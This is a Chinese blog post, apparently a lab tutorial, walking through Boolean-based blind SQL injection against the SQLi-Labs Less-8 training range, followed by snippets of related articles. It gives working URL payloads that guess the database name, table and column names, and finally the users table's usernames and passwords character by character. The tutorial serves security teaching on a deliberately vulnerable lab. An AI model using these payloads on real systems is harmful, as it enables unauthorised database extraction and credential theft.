SQL布尔,时间盲注

最新推荐文章于 2024-06-10 15:55:04 发布
最新推荐文章于 2024-06-10 15:55:04 发布
阅读量322 收藏
点赞数
文章标签: sql web安全 mysql
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_64332865/article/details/123009626
版权

关于布尔盲注某些场合下,页面返回的结果只有两种(正常或错误)。通过构造SQL判断语句,查看页面的返回结果(True or False)来判断哪些SQL判断条件成立,通过此来获取数据库中的数据。

一些功能函数的说明length(str):返回字符串 (str)的长度,以字节为单位。substr(str,pos,len):从指定的位置(pos)开始,截取并返回字符串 (str)指定长度(len)的子串。ascii(str):返回字符串 (str)最左边字符的 ASCl码。

1.访问SQLi-Labs 网站在攻击机 Pentest-Atk打开FireFox浏览器,并访问靶机A-SQLi-Labs 上的SQLi-Labs 网站Less-8。访问的URL为:http : // [靶机IP]/sqli-labs/Less-8 /(注意大小写)

 登录后,根据网页提示,给定一个?id=1的参数,即:http://[靶机 IP]/sqli-labs/Less-8 / ?id=1此时页面显示信息为You are in...,显示状态为True。

如果给定一个?id=-1的参数,即:http://[靶机 IP]/sqli-labs/Less-8/ ?id=-1此时页面显示信息为空,显示状态为False.

 

 2.寻找注入点分别使用以下3条payload寻找注入点及判断注入点的类型:http://[靶机 IP]/sqli-labs/Less-8 / ?id=1'运行后页面显示为False !

 http://[靶机 IP]/sqli-labs/Less-8 / ?id=1' and '1'='1运行后页面显示为True !

 3.盲猜网站当前所在数据库的库名长度不断变化M的值去猜测,如果M不等于N,页面应该显示为False;如果M等假设当前所在数据库的库名长度为N,尝试使用判断语句length(database())=M,于N,页面应该显示为True.例如执行如下payload:http://[靶机IP]/sqli-labs/Less-8/?id=1' and length( database( ))=7--+显示结果为False,说明网站当前所在数据库的库名长度不是7个字符!

 http:// [靶机 IP]/sqli-labs/Less-8/?id=1' and length(database( ) )=8--+显示结果为True,说明网站当前所在数据库的库名长度为8个字符!

 4.盲猜网站当前所在数据库的库名字符串本步骤通过逐个字母盲猜的方式进行。假设库名字符串的第1个字母为a,那么条件判断语句 substr(库名字符串,1,1)='a’以及ascii(substr(库名字符串,1,1))=97返回的结果均应为True (小写字母a的ASCII码为97) ;假设库名字符串的第2个字母为b,那么条件判断语句substr(库名字符串,2,1))='b’以及ascii(substr(库名字符串,2,1))=98返回的结果均应为True (写字母b的ASCIl码为98) ;以此类推。猜测库名的第1个字母:http://[靶机IP]/sqli-labs/Less-8/?id=1' and substr(database(),1,1)='s '--+或http:/ / [靶机 IP]/sqli-labs/Less-8 / ?id=1' andascii(substr(database(),1,1))=115--+库名的第1个字母为s。

猜测库名的第2个字母:http:// [靶机IP]/sqli-labs/Less-8/?id=1' and substr(database( ),2,1)='e '--+或http://[靶机IP]/sqli-labs/Less-8 / ?id=1' andascii(substr(database(),2,1))=101--+库名的第2个字母为e。

5.盲猜数据库security 的全部表名猜测第1张表的表名猜测第1张表的表名的第1个字符:http://[靶机IP]/sqli-labs/Less-8/?id=1' and substr((select table_name frominformation_schema.tables where table_schema='security' limit0,1),1,1)='e'--+或http://[靶机 IP]/sqli-labs/Less-8/?id=1' and ascii(substr((select table_namefrom information_schema.tables where table_schema= 'security' limit0,1),1,1))=101--+第1张表的表名的第1个字符为e。

猜测第1张表的表名的第2个字符:http:// [靶机IP]/sqli-labs/Less-8/?id=1' and substr((select table_name frominformation_schema.tables where table_schema='security' limit0,1),2,1)= 'm '--或http:// [靶机IP]/sqli-labs/Less-8/?id=1' and ascii(substr((select table_namefrom information_schema.tables where table_schema='security' limit
0,1),2,1))=109--+

6.盲猜users表的全部字段名
(1)猜测第1个字段名猜测第1个字段名的第1个字符:
http:// [靶机IP]/sqli-labs/Less-8/?id=1' and substr((select column_name frominformation_schema.columns where table_schema= 'security' and
table_name='users' limit 0,1),1,1)='i'--+或http:// [靶机 IP]/sqli-labs/Less-8/?id=1' and ascii(substr((select column_namefrom information_schema.columns where table_schema='security' and
table_name='users' limit 0,1),1,1))=105--+
第1个字段名的第1个字符为i。

7.盲猜users表username和l password字段的全部值
(1)猜测第1组数据猜测第1组数据的第1个字符:
http://[靶机 IP]/sqli-labs/Less-8/?id=1' and substr( (select
concat_ws ( ' , ' ,username ,password ) from security.users limit 0,1),1,1)='D'--+或
http : //[靶机IP]/sqli-labs/Less-8/?id=1' and ascii(substr( (select
concat_ws( ' , ' , username,password ) from security.users limit 0,1),1,1))=68--+
第1组数据的第1个字符为D。

qq_64332865
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
sql注入之布尔盲注
笔墨稠思
11-13 170
什么是盲注? 所谓盲注,就是在服务器没有错误回显的时候完成注入攻击 什么是布尔盲注? 布尔,这个词很明显,他会根据我们输入的注入信息,返回True和False,没有其他的任何报错信息 实现布尔盲注需要利用一下几个函数 length() 返回字符串长度 substr() 截取字符串 ascii() 返回字符的ascii码 靶场实战: 我们发现这个靶场为get传参,参数为id = 1 首先我们判断是否存在注入 我们把传参改为id = 2 - 1 发现数据返
sqlserver数据库布尔盲注_SQL注入之基于布尔盲注详解
weixin_30623181的博客
12-24 1268
基于布尔盲注Web的页面的仅仅会返回True和False。那么布尔盲注就是进行SQL注入之后然后根据页面返回的True或者是False来得到数据库中的相关信息。由于本次是布尔注入,手注无法完整地进行脱裤。所以在本节需要编写大量的代码来帮助我们进行SQL注入,得到数据。所以在这章里面会有很多的Python代码。本次的示例就是Less-8。通过进行下面的语句的注入测试http://localhost...
SQL布尔盲注
石页
03-26 3877
SQL布尔盲注常用函数注入步骤1. 爆数据库名称长度2.爆库名3.确定当前库中表的个数4.爆表名长度5.爆表名6.爆表项个数7.爆表项长度8.爆表项9.爆数据 常用函数 substr(str,from,length) 返回从下标为from截取长度为length的str子串。其中,首字符下标为1 length(str) 返回字符串长度 ASCII(char) 返回char的ascii码,常与substr一起使用 注入步骤 输入id以查询 查询成功返回success\color{#00FF00
SQL注入—盲注(一)布尔盲注
xiaoyang886_的博客
06-10 603
id=1' order by 1--+没变化 id=1' order by 2--+没变化 id=1' order by 3--+没变化?and (ascii(substr(database(),1,1)))=115--+ 返回正常,说明数据库名称第一位是 s。
SQL盲注布尔盲注
Dug123456_的博客
04-07 1302
flag有固定的格式,以右花括号结束,假设flag有小写英文字母、下划线、花括号构成,由于不知道flag长度,要一个无限循环,定义计数符j,内嵌循环i遍历小写、下划线和花括号,匹配到字符后j++,出循环的条件是当前i是右花括号,即flag结束。再大循环i次(遍历所有表),内嵌循环j次(表名的所有字符),i是表下标-1,j是字符下标,再内嵌循环k从a到z(假设表名全是小写英文字符)尝试获取每个表的表名。1 and length(database())=4 //判断数据库名字的长度是否为4。
SQL注入之基于布尔盲注详解
09-10
在基于布尔盲注中,攻击者通常会尝试构造一系列的SQL查询,这些查询会在满足特定条件时改变原本的查询结果,从而导致网页返回不同的状态。例如,通过在URL中添加`id=2' and length(database())>1 %23`这样的参数,...
SQL盲注篇之布尔盲注
weixin_47785246的博客
07-11 3024
简单介绍SQL注入中的盲注,通过靶场的练习,演示SQL盲注的一些常用方法与思路。
sqlserver数据库布尔盲注_SQL注入实战之盲注篇(布尔时间盲注
weixin_32179749的博客
01-14 986
首先还是写一下核心的语句吧。information_schemaschemata(schema_name)tables(table_schema,table_name)columns(table_schema,table_name,column_name)select schema_name from information_schema.schemata;select table_name fr...
sql盲注 解决_SQL注入之基于布尔盲注详解
weixin_39638086的博客
12-19 551
基于布尔盲注Web的页面的仅仅会返回True和False。那么布尔盲注就是进行SQL注入之后然后根据页面返回的True或者是False来得到数据库中的相关信息。由于本次是布尔注入,手注无法完整地进行脱裤。所以在本节需要编写大量的代码来帮助我们进行SQL注入,得到数据。所以在这章里面会有很多的Python代码。本次的示例就是Less-8。通过进行下面的语句的注入测试http://localhost...
sql盲注_布尔盲注
sugar_by的博客
06-02 454
盲注:页面没有报错回显,不知道数据库具体返回值的情况下,对数据库中的内容进行解,实行sql注入 盲注分类:布尔盲注时间盲注、报错盲注 布尔注入:web页面只返回true真,false假俩种类型。利用页面返回不同,逐个解数据 查询命令可以执行但是不会返回,使用ascii()函数把字符转变为ascii表对应的数字 substr((),)函数,substr((batabase()),1,1) substr(数据库/字符串,输出第一个字符,一次输出一个字符) 第一个是那个字符 说明第一个字符就在
SQL盲注--布尔盲注
Auroraxsn的博客
04-27 3008
一、布尔盲注 1.特征: 某些网站输入参数后会判断,然后根据结果是或非返回页面。即普通注入只会返回其他页面,并没有回显 2.解决原理: 用函数(regexp,like,ascii,left,ord,mid,length)相关信息,正确时与错误时返回页面不一样,根据返回的页面来判断正确的数据信息。 3.基本流程 (1.判断注入类型 (2.判断列数 (3.获取数据库长度 构建有关数据库名的表达式,看页面返回情况判断表达式对错 length(str) 函数,返回字符串的长度 ...
SQL注入之布尔盲注
qq_45076423的博客
11-12 436
布尔盲注 如果确定页面注入点存在,如果页面没有回显并且没有报错信息可以考虑使用布尔盲注布尔盲注的判断条件是页面布尔类型状态。 当传递参数[?id=1' and 1=1 --+] 当传递参数[?id=1’ and 1=2 --+] 比较两次的传递的参数,页面明显存在差异(布尔类型状态)。 利用这个差异,我们可以一点一点得到数据库的内容。例如想要获取当前数据库的名字。 1. 判断数据库名字的...
sql注入之 布尔盲注
qq_46185846的博客
02-14 214
一:布尔盲注 盲注,就是在服务器没有错误回显是完成的注入攻击。服务器没有错误回显,对于攻击者来说缺少了非常重要的信息,所以攻击者必须找到一个方法来验证注入的sql语句是否得到了执行。 注入原理 布尔忙住一般适用于 页面没有回显字段(不支持联合查询),而且web页面返回true或者false,构造sql语句 利用and or 等关键词来时web页面返回true或者false,从而达到注入的目的来获...
SQL注入布尔盲注
weixin_43765321的博客
03-03 1020
1. 盲注 布尔盲注 特点:页面存在异常,但是既无回显也无报错信息 利用:只能通过正确与错误两种状态来判断payload是否正确 没有显示位,也没有MySQL_error()函数 仅有的两段输出信息,如下图所示: 2. 布尔 布尔运算是数字符号化的逻辑推演法,包括联合、相交、相减。在图形处理操作中引入了这种逻辑运算方法以使简单的基本图形组合产生新的形体,并由二维布尔运算发展到三维图形的布尔运算。由于布尔在符号逻辑运算中的特殊贡献,很多计算机语言中将逻辑运算称为布尔运算,将其结果称为布尔值。 3. 布尔
SQL注入——布尔盲注
heyingcheng的博客
03-07 722
测是第一个字母的ascii码是115,页面显示为真,再查表,得出对应字母。后续的操作是依次解,陆续得出数据。布尔盲注Web页面只返回True真,False假两种类型,利用页面的返回不同,逐个解数据。页面没有报错回显,不知道数据库具体返回值的情况下,对数据库中的内容进行解,实行SQL注入。对方既没有回显位又没有报错,如果页面有真假值切换,我们就可以使用布尔盲注。当我们解数据库名称的第一个字母的ascii是120,页面显示false。盲注分类:布尔盲注时间盲注,报错盲注
sql注入布尔盲注流程
最新发布
06-28
SQL注入布尔盲注是一种利用SQL注入技术来检测查询结果是否满足某个条件的攻击方法,它通常在应用程序中用于验证用户输入时使用。以下是SQL注入布尔盲注的基本流程: 1. **识别可注入点**:攻击者首先尝试找出页面上...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值